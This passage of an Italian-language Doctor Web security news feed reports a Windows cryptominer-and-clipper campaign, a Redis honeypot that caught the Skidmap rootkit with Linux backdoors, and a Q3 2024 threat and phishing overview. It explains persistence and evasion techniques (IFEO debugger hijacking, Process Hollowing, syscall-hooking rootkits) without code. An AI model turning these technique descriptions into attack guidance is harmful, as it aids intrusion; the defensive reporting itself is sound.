 IFEO (Image File Execution Options) sono funzionalità fornite dal sistema operativo Windows per gli sviluppatori di software, ad esempio, esecuzione automatica del programma di debug all'avvio dell'applicazione. Gli attori malevoli però possono utilizzare le tecniche IFEO per la persistenza nel sistema. Per fare ciò, cambiano il percorso del programma di debug indicando invece di esso il percorso del file malevolo, in modo che ad ogni avvio dell'applicazione legittima verrà avviata anche quella malevola. Nel caso in esame gli hacker "si aggrappavano" ai servizi di sistema di SO Windows, e inoltre, ai processi di aggiornamento dei browser Google Chrome e Microsoft Edge (&lt;span class="string"&gt;MoUsoCoreWorker.exe&lt;/span&gt;, &lt;span class="string"&gt;svchost.exe&lt;/span&gt;, &lt;span class="string"&gt;TrustedInstaller.exe&lt;/span&gt;, &lt;span class="string"&gt;GoogleUpdate.exe&lt;/span&gt; e &lt;span class="string"&gt;MicrosoftEdgeUpdate.exe&lt;/span&gt;).
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;Li&gt;Vieta l'accesso all'eliminazione, la scrittura e la modifica per le cartelle e i file creati nel passaggio 2&lt;/Li&gt;
  &lt;Li&gt;Disattiva il servizio di ripristino del sistema operativo Windows&lt;/Li&gt;
  &lt;Li&gt;Invia in Telegram ai malintenzionati informazioni sulle caratteristiche tecniche del computer infetto, il suo nome, la versione di SO e informazioni su software antivirus installato.&lt;/Li&gt;
&lt;/ol&gt;

&lt;p&gt;Le funzioni di mining nascosto e di furto di criptovalute vengono svolte dai file &lt;span class="string"&gt;DeviceId.dll&lt;/span&gt; e &lt;span class="string"&gt;7zxa.dll&lt;/span&gt;. Entrambi i file vengono incorporati nel processo &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Esplora file di SO Windows) tramite la tecnica Process Hollowing. Il primo file è una libreria legittima distribuita come parte dell'ambiente di sviluppo .NET, nella quale è stato incorporato uno script malevolo AutoIt che lancia il cryptominer &lt;a href="https://vms.drweb-av.it/search/?q=SilentCryptoMiner&amp;lng=it"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt;. Questo cryptominer possiede ampie funzionalità di configurazione e mascheramento del processo di estrazione di criptovalute, nonché una funzione di gestione remota.&lt;/p&gt;

&lt;blockquote&gt;
 La libreria &lt;span class="string"&gt;7zxa.dll&lt;/span&gt;, camuffata da componente del programma di compressione 7-Zip, è un cosiddetto clipper. Questo tipo di malware viene utilizzato per il monitoraggio dei dati nella clipboard, i quali esso può sostituire furtivamente o inoltrare ai malintenzionati. Nel caso in esame, il clipper traccia la comparsa nella clipboard delle sequenze tipiche di caratteri caratteristici degli indirizzi di portafogli e le sostituisce con quelle che sono state indicate dai malintenzionati. Al momento della pubblicazione, si sa per certo che solo con il clipper gli hacker hanno potuto guadagnare più di 6000 dollari.
&lt;/blockquote&gt;

&lt;p&gt;La tecnica Process Hollowing consiste nell'avviare un processo fidato in stato sospeso, sovrascriverne il codice in memoria con quello malevolo, e quindi riprendere l'esecuzione del processo. L'impiego di questa tecnica causa la comparsa di copie omonime del processo, così nel nostro caso sui computer delle vittime si potevano osservare tre processi &lt;span class="string"&gt;explorer.exe&lt;/span&gt;, il che è di per sé sospetto, poiché normalmente questo processo esiste in un unico esemplare.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Attack_Chain_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;  

&lt;p&gt;In totale, dalle attività dei cybercriminali sono state colpite più di 28mila persone, la stragrande maggioranza di cui sono abitanti di Russia. Inoltre, numeri significativi di infezioni vengono osservati in Bielorussia, Uzbekistan, Kazakistan, Ucraina, Kirghizistan e Turchia. In quanto la compromissione dei computer delle vittime avveniva con installazioni di versioni piratate di popolari programmi, le principali raccomandazioni per la prevenzione dei simili incidenti sono scaricare software da fonti ufficiali, utilizzare programmi analoghi open source, nonché utilizzare antivirus. Gli utenti dei prodotti Dr.Web sono protetti in modo affidabile da questa minaccia.&lt;/p&gt;

&lt;p&gt;Più informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.1443&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.1443&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Metack/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=14918&amp;lng=it</guid><title>Esca per malintenzionati: honeypot con versione vulnerabile di database Redis consente di rilevare nuova variante di un rootkit volto a nascondere processo di mining criptovalute</title><link>https://news.drweb-av.it/show/?i=14918&amp;lng=it&amp;c=9</link><pubDate>Thu, 03 Oct 2024 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;3 ottobre 2024&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Gli analisti dei virus dell'azienda Doctor Web hanno rilevato una nuova variante rootkit che installa sulle macchine compromesse con sistema operativo Linux un trojan cryptominer chiamato Skidmap. Questo rootkit è realizzato come modulo kernel malevolo che nasconde l'attività del cryptominer sostituendo furtivamente le informazioni sul carico della CPU e sull'attività di rete. Questo attacco è di massa ed è rivolto principalmente al settore aziendale — grandi server e ambienti cloud — poiché su tali risorse l'efficienza del mining sarà massima.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Il database management system Redis è uno dei più popolari al mondo: i server Redis vengono utilizzati da grande aziende, quale X (precedentemente Twitter), AirBnB, Amazon e altre ancora. I vantaggi del sistema sono evidenti: massime prestazioni, minimi requisiti di risorse, supporto di vari tipi di dati e linguaggi di programmazione. Tuttavia, questo prodotto ha anche svantaggi: in quanto l'iniziale uso di Redis non presupponeva la sua installazione sulla periferia di rete, nella configurazione di default sono supportate solo le funzioni di sicurezza di base, e nelle versioni precedenti alla 6.0 mancano i meccanismi di controllo di accessi e di crittografia. Oltre a ciò, nei media specializzati ogni anno compaiono messaggi sul rilevamento di vulnerabilità in Redis. Ad esempio, nel 2023 ne sono state registrate 12, tre di cui avevano lo status "Seria". I messaggi diventati sempre più frequenti sulla compromissione di server con la successiva installazione di programmi per il mining di criptovalute avevano incuriosito gli specialisti del laboratorio dei virus Doctor Web, cui è venuta l'idea di osservare tale attacco direttamente. Per questo è stato deciso di lanciare un proprio server Redis con protezione disattivata e attendere la comparsa degli ospiti non invitati. Nel periodo di un anno, venivano intrapresi dai 10 ai 14mila attacchi al server ogni mese, e di recente sul server è stata rilevata la presenza di un malware, ovvero Skidmap, su cui contavano i nostri analisti. Tuttavia, è stata una cosa inaspettata che in questo caso i cybercriminali hanno utilizzato un nuovo metodo per nascondere l'attività del cryptominer, e anche hanno installato quattro backdoor allo stesso tempo.&lt;/p&gt;

&lt;p&gt;I primi messaggi sul trojan Skidmap sono comparsi nel 2019. Questo trojan cryptominer ha una determinata specializzazione e si riscontra principalmente nelle reti aziendali, poiché la maggiore resa dal mining nascosto può essere ottenuta proprio nel segmento aziendale. Nonostante siano trascorsi già cinque anni dalla comparsa del trojan, il principio del suo funzionamento rimane invariato: viene installato sul sistema con lo sfruttamento di vulnerabilità o tramite impostazioni software errate. Nel caso del nostro server esca, gli hacker hanno aggiunto allo scheduler di sistema task cron nell'ambito dei quali ogni 10 minuti veniva eseguito uno script che scarica un dropper chiamato &lt;a href="https://vms.drweb-av.it/search/?q=Linux.MulDrop.142&amp;lng=it"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt; (o un'altra sua variante &lt;a href="https://vms.drweb-av.it/search/?q=Linux.MulDrop.143&amp;lng=it"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;). Questo file eseguibile controlla la versione del kernel del sistema operativo, disattiva il modulo di sicurezza SELinux, e quindi spacchetta nel sistema i file di un rootkit &lt;a href="https://vms.drweb-av.it/search/?q=Linux.Rootkit.400&amp;lng=it"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt;, di un cryptominer &lt;a href="https://vms.drweb-av.it/search/?q=Linux.BtcMine.815&amp;lng=it"&gt;&lt;b&gt;Linux.BtcMine.815&lt;/b&gt;&lt;/a&gt;, nonché dei backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Linux.BackDoor.Pam.8&amp;lng=it"&gt;&lt;b&gt;Linux.BackDoor.Pam.8&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/9&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Linux.BackDoor.SSH.425&amp;lng=it"&gt;&lt;b&gt;Linux.BackDoor.SSH.425&lt;/b&gt;&lt;/a&gt;&lt;b&gt;/426&lt;/b&gt; e di un trojan &lt;a href="https://vms.drweb-av.it/search/?q=Linux.BackDoor.RCTL.2&amp;lng=it"&gt;&lt;b&gt;Linux.BackDoor.RCTL.2&lt;/b&gt;&lt;/a&gt; studiato per l'accesso remoto. Una peculiarità del dropper è che è di dimensioni piuttosto grandi in quanto contiene file eseguibili per varie distribuzioni Linux. In questo caso, nel corpo del dropper erano trascritti all'incirca 60 file per diverse versioni delle distro Debian e Red Hat Enterprise Linux, più comunemente installate sui server.&lt;/p&gt;

&lt;p&gt;Dopo l'installazione il rootkit intercetta una serie di chiamate di sistema, il che consente ad esso di restituire informazioni false in risposta ai comandi diagnostici immessi dall'amministratore. Le funzioni intercettate includono quelle che segnalano il valore medio di carico della CPU, l'attività di rete su una serie di porte e restituiscono l'elenco di file in cartelle. Il rootkit anche controlla tutti i moduli di kernel che vengono caricati e vieta l'avvio di quelli in grado di rilevare la sua presenza. Tutto ciò consente di nascondere completamente tutti gli aspetti dell'attività di mining di criptovalute del cryptominer: computazioni, invio di hash e ricezione di task.&lt;/p&gt;

&lt;p&gt;Lo scopo dei backdoor installati dal dropper nell'ambito di questo attacco consiste nel salvare e inviare ai malintenzionati dati su tutte le autenticazioni SSH, nonché nel creare una password principale di tutti gli account nel sistema. Va notato che tutte le password al momento dell'invio vengono crittografate con il cifrario di Cesare con uno spostamento di 4 posizioni.&lt;/p&gt;

&lt;p&gt;Per espandere le possibilità di controllo del sistema hackerato, i malintenzionati installano un trojan di accesso remoto &lt;a href="https://vms.drweb-av.it/search/?q=Linux.BackDoor.RCTL.2&amp;lng=it"&gt;&lt;b&gt;Linux.BackDoor.RCTL.2&lt;/b&gt;&lt;/a&gt;. Consente di inviare comandi al server compromesso e ricevere da esso qualsiasi dato tramite una connessione crittografata che il trojan avvia autonomamente.&lt;/p&gt;

&lt;p&gt;Come cryptominer viene installato il programma xmrig che consente di estrarre una serie di criptovalute, la più famosa di cui è Monero, che ha guadagnato popolarità nella darknet grazie al suo completo anonimato a livello di transazioni. Va detto che rilevare un cryptominer nascosto da un rootkit in un cluster di server non è un compito banale. In assenza di informazioni veritieri sul consumo delle risorse, l'unica cosa che potrebbe indicare l'avvenuta compromissione è il consumo energetico eccessivo e la generazione di calore aumentata. I malintenzionati possono anche modificare le impostazioni del cryptominer in modo tale da assicurare un bilanciamento ottimale tra la produttività del mining e il mantenimento delle prestazioni dell'hardware, il che consentirà di attirare meno attenzione sul sistema compromesso.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/Artboard_en.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;L'evoluzione della famiglia di malware Skidmap si manifesta in uno schema di attacco sempre più complesso: i programmi avviati effettuano chiamate gli uni agli altri, disattivano i sistemi di sicurezza, interferiscono con il funzionamento di un gran numero di utility e servizi di sistema, scaricano rootkit ecc., il che complica notevolmente la risposta a tali incidenti.&lt;/p&gt;

&lt;p&gt;Le minacce sopra elencate sono inserite nel database dei virus Dr.Web e perciò non rappresentano un pericolo per gli utenti dei nostri prodotti.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/skidmap" target="_blank" rel="noopener noreferrer"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Più informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Linux.MulDrop.142&amp;lng=it"&gt;&lt;b&gt;Linux.MulDrop.142&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Più informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Linux.MulDrop.143&amp;lng=it"&gt;&lt;b&gt;Linux.MulDrop.143&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Più informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Linux.MulDrop.144&amp;lng=it"&gt;&lt;b&gt;Linux.MulDrop.144&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Più informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Linux.Rootkit.400&amp;lng=it"&gt;&lt;b&gt;Linux.Rootkit.400&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=14915&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in III trimestre 2024</title><link>https://news.drweb-av.it/show/?i=14915&amp;lng=it&amp;c=9</link><pubDate>Tue, 01 Oct 2024 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;1 ottobre 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web nel III trimestre 2024 il numero totale di minacce rilevate è aumentato del 10,81% rispetto al II trimestre. Il numero di minacce uniche è diminuito del 4,73%. La maggior parte dei rilevamenti di nuovo è rappresentata dalle applicazioni pubblicitarie. Sono diffusi anche gli script malevoli, i trojan che visualizzano annunci pubblicitari, e i trojan che vengono distribuiti come parte di altre applicazioni malevole e utilizzati per ostacolarne il rilevamento. Nel traffico email il più spesso venivano rilevati gli script e le applicazione malevole che sfruttano le vulnerabilità di documenti Microsoft Office.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Sui dispositivi Android le minacce più diffuse sono stati i trojan impiegati per scopi fraudolenti &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, i trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; e i programmi malevoli possedenti funzionalità varie &lt;b&gt;Android.Siggen&lt;/b&gt;. Inoltre, ad agosto i nostri specialisti hanno scoperto un nuovo trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, che ha infettato quasi 1.300.000 box TV con sistema operativo Android. Oltre a questo, il laboratorio dei virus Doctor Web ha individuato durante il III trimestre numerose nuove minacce sullo store di app Google Play.&lt;/p&gt;
  
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principali tendenze di III trimestre&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Le applicazioni pubblicitarie sono rimaste le minacce più spesso rilevate.&lt;/li&gt;
      &lt;li&gt;Nel traffico email malevolo come prima predominavano gli script malevoli.&lt;/li&gt;
      &lt;li&gt;È stata rilevata un'infezione di oltre 1.000.000 di box TV su base Android con il backdoor &lt;a href="https://vms.drweb-av.it/search/?q=Android.Vo1d&amp;lng=it"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
      &lt;li&gt;Sono state registrate nuove minacce sullo store di app Google Play.      &lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/01_stat_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/01_stat_q3_2024_en.1.png" alt="Secondo i dati del servizio delle statistiche Doctor Web"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;Minacce più diffuse di III trimestre:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20477&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Adware utilizzato come installer intermedio di software pirata.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.StartPage1.62722&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Programma malevolo che sostituisce furtivamente la pagina iniziale nelle impostazioni del browser.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Un client torrent che installa software indesiderati sul dispositivo.&lt;/dd&gt; 
  &lt;/dl&gt;


  &lt;h2 class="alignCenter"&gt;Statistiche sulle applicazioni malevole nel traffico email&lt;/h2&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/02_mail_traffic_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/02_mail_traffic_q3_2024_en.1.png" alt="Statistiche sulle applicazioni malevole nel traffico email"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Una famiglia di script malevoli, scritti nel linguaggio JavaScript. Incorporano uno script malevolo nel codice HTML di pagine web.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di una scorciatoia appositamente formata che viene distribuita tramite unità rimovibili e, per fuorviare gli utenti, ha l'icona di un disco. Alla sua apertura, vengono avviati script VBS malevoli da una directory nascosta situata sulla stessa unità della scorciatoia.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.6154&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1410&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Rilevamento di una versione impacchettata del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; scritto nel linguaggio di script AutoIt. Viene distribuita come parte di un gruppo di diverse applicazioni malevole: un miner di criptovalute, un backdoor e un modulo per la propagazione autonoma. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; esegue varie azioni malevole che ostacolano il rilevamento del payload principale.&lt;/dd&gt;  
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="encryptor"&gt;
  &lt;h2 class="alignCenter"&gt;Ransomware di criptazione&lt;/h2&gt;
  &lt;p&gt;Nel III trimestre 2024, rispetto al II trimestre, è diminuito del 15,73% il numero di richieste per la decriptazione di file interessati da trojan ransomware di criptazione.&lt;/p&gt;
  &lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al servizio di supporto tecnico Doctor Web:&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/03_encoder_requests_q3_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/03_encoder_requests_q3_2024_en.1.png" alt="Ransomware di criptazione"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;p&gt;Ransomware di criptazione più diffusi di III trimestre:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 19.38%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.3953&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.3953&lt;/b&gt;&lt;/a&gt; — 9.42%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.38200&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 3.99%&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.26996&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2.89%&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.72%&lt;/dt&gt;
  &lt;/dl&gt;
&lt;/section&gt;


&lt;section class="margTM margBM" id="dangerous"&gt;
  &lt;h2 class="alignCenter"&gt;Frode online&lt;/h2&gt;
  &lt;p&gt;Durante il III trimestre 2024 i truffatori online hanno continuato a distribuire le email spam con link a vari siti di phishing. Ad esempio, gli utenti di lingua russa di nuovo dovevano affrontare i messaggi presumibilmente inviati a nome dei noti negozi online. In alcuni messaggi gli utenti venivano invitati a partecipare ad un'estrazione a premi od ottenere un regalo. Cliccando i link in tali email, le potenziali vittime andavano a siti truffa sui quali loro veniva chiesto di pagare una commissione per "ricevere" il premio o la vincita in questione.&lt;/p&gt;
  
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/04_fake_store_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/04_fake_store_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;I truffatori, presumibilmente a nome del negozio online, suggeriscono alla potenziale vittima di "ricevere la vincita" di 208.760 rubli&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;In altre email agli utenti presumibilmente aspetterebbe uno sconto sull'acquisto di merci in un grande negozio di elettronica. I link da questi messaggi portavano a un sito falsificato, progettato nello stile della vera risorsa internet del venditore. Facendo un "ordine" su questo sito, le potenziali vittime dovevano fornire i propri dati personali, nonché i dati di una carta bancaria.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/05_fake_store_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/05_fake_store_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Email truffaldina che suggerisce di "attivare il codice promo" per l'acquisto di prodotti di elettronica&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Rimangono popolari tra i truffatori i messaggi spam a tema finanziario. Così, i malintenzionati inviavano email indesiderate per la "conferma" della ricezione di cospicui trasferimenti di denaro. Un esempio di tale email mirata agli utenti di lingua inglese è presentato di seguito. Il link in essa contenuto portava a un modulo di phishing di accesso all'account del cliente bancario esteriormente somigliante a quello sul vero sito dell'istituto di credito.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/06_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/06_fake_bank_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;All'utente viene chiesto di confermare la presunta ricezione di $1218,16 USA.&lt;/em&gt;&lt;/p&gt;

  &lt;div class="margTM column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/07_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/07_fake_bank_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Il sito di phishing di banca spacciato dai truffatori per quello vero&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Tra le email indesiderate destinate al pubblico giapponese i nostri specialisti hanno registrato le ennesime false notifiche di istituzioni creditizie — ad esempio, con informazioni sugli addebiti su carta bancaria per un mese. In uno di questi messaggi i truffatori hanno mascherato un link a un sito di phishing: gli utenti vedevano nel testo della mail i link ai veri indirizzi del sito di una banca, ma il clic su di essi reindirizzava a una risorsa internet fraudolenta.&lt;/p&gt;
  
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/08_ja_spam_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/08_ja_spam_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Tutti i link nella mail in realtà portano al sito di phishing&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Gli utenti di lingua francese (in particolare, da Belgio) si imbattevano in email di phishing che li informavano sul "blocco" dei loro conti bancari. Per "sbloccare" i conti, gli utenti venivano chiesti di utilizzare il link fornito il quale in realtà portava al sito dei imbroglioni.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/09_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/09_fake_bank_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;I truffatori intimidiscono le potenziali vittime con l'account bancario “bloccato”&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;E tra gli utenti da Russia di nuovo venivano attivamente distribuite le email spam in cui le potenziali vittime venivano invitate, presumibilmente a nome di note banche, a diventare investitori. I link in questi messaggi indesiderati portano ai siti fraudolenti dove agli visitatori, con il pretesto dell'ottenimento dell'accesso ai servizi web di investimento, vengono chiesti i loro dati personali.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/10_fake_bank_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/10_fake_bank_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;L'utente, presumibilmente a nome della banca, viene invitato a fare un test e diventare investitore&lt;/em&gt;&lt;/p&gt;

  &lt;p&gt;Allo stesso tempo, gli analisti internet Doctor Web hanno identificato nuovi siti di phishing mirati ai proprietari di criptovalute. Così, su uno di essi, i visitatori, presumibilmente a nome di un grande scambio di criptovalute, venivano informati su un trasferimento Bitcoin non consegnato. Per "completare" la transazione, alle potenziali vittime veniva chiesto di pagare una "commissione". Naturalmente, gli utenti non ricevevano alcuna criptovaluta — invece, davano ai truffatori i propri beni.&lt;/p&gt;

  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/september/review_common/11_fake_crypto_q3_2024.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/september/review_common/11_fake_crypto_q3_2024.1.png" alt="Frode online"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Il sito fraudolento comunica che per l'utente presumibilmente ci sarebbe un trasferimento Bitcoin non ricevuto&lt;/em&gt;&lt;/p&gt;

